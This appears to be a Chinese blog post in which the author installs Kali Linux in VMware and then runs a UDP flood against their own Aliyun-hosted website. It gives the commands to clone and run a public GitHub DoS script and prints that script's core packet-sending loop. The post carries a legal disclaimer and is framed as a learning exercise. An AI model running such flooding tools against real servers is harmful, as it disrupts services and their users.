对自己的博客网站进行DOS攻击

对自己的博客网站进行DOS攻击

先说明一点,别对别人的网站进行ddos/dos攻击(dos攻击一般短时间攻击不下来),这是违法的,很多都有自动报警机制,本篇博客仅用于学习,请勿用于非法用途

安装kaili Linux

进入KALI官网,下载iso镜像文件

vmware新建虚拟机,选择自定义

点击下一步

点击下一步

点击下一步

选择稍后安装操作系统,点击下一步

选择Debian系统,版本根据自己的kali版本来,我这里就选最新的Debian12,点击下一步

虚拟机名称和存储位置根据自己情况来,点击下一步

处理器配置根据自己电脑的配置来,点击下一步

内存也是根据自己的使用情况来,点击下一步

点击下一步

点击下一步

点击下一步

点击下一步

点击下一步

点击下一步

点击自定义硬件

导入下载好的ISO文件,关闭后点击完成即可

剩下启动后的配置就比较简单了,根据自己情况来即可

安装完成后打开是这样的:

换源+更新

进入root权限

shell 复制代码
sudo su

输入密码后,换源

shell 复制代码
sudo vim /etc/apt/sources.list

部分国内源:

shell 复制代码
官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
浙大
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
东软大学
deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
重庆大学
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

自己选一个换上就行,然后进行更新:

shell 复制代码
sudo apt-get update
DOS攻击

未被攻击前访问我的网站是这样的:

下载Dos数据包

shell 复制代码
git clone https://github.com/Andysun06/ddos

进入ddos文件夹

shell 复制代码
cd ddos

执行python脚本

shell 复制代码
python ddos-p3.py

下面这两张用的是别人的图,不想打码了(雾

反正我攻击了大概8分钟,网站还是可以正常访问的,由于阿里云服务器有一定量的免费的cdn防护,我个人进行DOS攻击至少需要一小时才能耗完.这次只是实验一下,所以就不继续了.

我们可以看到受到攻击后服务器的带宽是有被大量消耗的,说明我们的攻击是有效的.

代码分析

去作者的github上把代码拉下来,看看是怎么写的:

python 复制代码
os.system("clear")
os.system("figlet DDos Attack")
ip = input("请输入 IP     : ")
port = int(input("攻击端口      : "))
sd = int(input("攻击速度(1~1000) : "))

os.system("clear")

sent = 0
while True:
     sock.sendto(bytes, (ip,port))
     sent = sent + 1
     print ("已发送 %s 个数据包到 %s 端口 %d"%(sent,ip,port))
     time.sleep((1000-sd)/2000)

核心代码就这么几行,其实就是不断向指定IP的端口发送数据包,然后打印发送数据包的个数.

本人也是初入安全的小白,有什么不对的地方欢迎在评论区指出

相关推荐
Heavy sea1 小时前
Linux串口应用编程
linux·c语言·1024程序员节
Justin_191 小时前
Galera Cluster部署
linux·服务器·nginx
洛克大航海4 小时前
虚拟机 Ubuntu 中安装 Google Chrome 浏览器
linux·chrome·ubuntu
DeeplyMind4 小时前
AMD rocr-libhsakmt分析系列3-4:svm-reserve模式实现分析
linux·驱动开发·1024程序员节·amdgpu·kfd·rocr
神秘的土鸡4 小时前
从数据仓库到数据中台再到数据飞轮:我的数据技术成长之路
java·服务器·aigc·数据库架构·1024程序员节
大米粥哥哥4 小时前
Qt QProcess基于Linux的命令管道符号无效问题【已解决】
linux·qt·shell·qprocess·1024程序员节·管道符号
Mr. Sun_5 小时前
Dell Networking SmartFabric OS10 如何设置虚拟链路中继 (VLT)
运维·网络·dell vlt
北京迅为5 小时前
【北京迅为】iTOP-4412精英版使用手册-第六十七章 USB鼠标驱动详解
linux·人工智能·嵌入式·4412
骑士9991115 小时前
rabbitMQ 的安装和使用
linux·rabbitmq
小白不想白a5 小时前
【shell】每日shell练习:系统备份文件管理/系统性能趋势分析
linux·服务器